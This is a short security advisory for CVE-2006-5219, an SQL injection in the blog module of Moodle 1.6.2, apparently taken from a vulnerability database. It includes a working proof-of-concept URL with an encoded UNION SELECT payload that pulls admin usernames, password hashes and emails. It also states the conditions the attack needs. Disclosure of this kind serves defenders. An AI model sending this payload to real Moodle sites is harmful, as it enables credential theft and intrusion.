Topic : | SQL injection - moodle 1.6.2
|
SecurityAlert : 1699
CVE : CVE-2006-5219
SecurityRisk : Medium (About)
Remote Exploit : Yes
Local Exploit : No
Exploit Available : Yes
Credit : disfigure (disfigure gmail com)
Published : 12.10.2006
Affected Software : | moodle 1.6.2 |
 Advisory Content : /****************************************/
http://www.w4cking.com
Product:
moodle 1.6.2
http://www.moodle.org
Vulnerability:
SQL injection
Notes:
- SQL injection can be used to obtain password hash
- the moodle blog "module" must be enabled
- guest access to the blog must be enabled
POC:
<target>/blog/index.php?tag=x%2527%20UNION%20SELECT%20%2527-1%20UNION%20
SELECT%201,1,1,1,1,1,1,username,password,1,1,1,1,1,1,1,username,password
,email%20FROM%20mdl_user%20RIGHT%20JOIN%20mdl_user_admins%20ON%20mdl_use
r.id%3dmdl_user_admins.userid%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1
,1,1,1,1,1,1,1%20FROM%20mdl_post%20p,%20mdl_blog_tag_instance%20bt,%20md
l_user%20u%20WHERE%201%3D0%2527,1,1,%25271
Original advisory (requires registration):
http://w4ck1ng.com/board/showthread.php?t=1305
/****************************************/
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|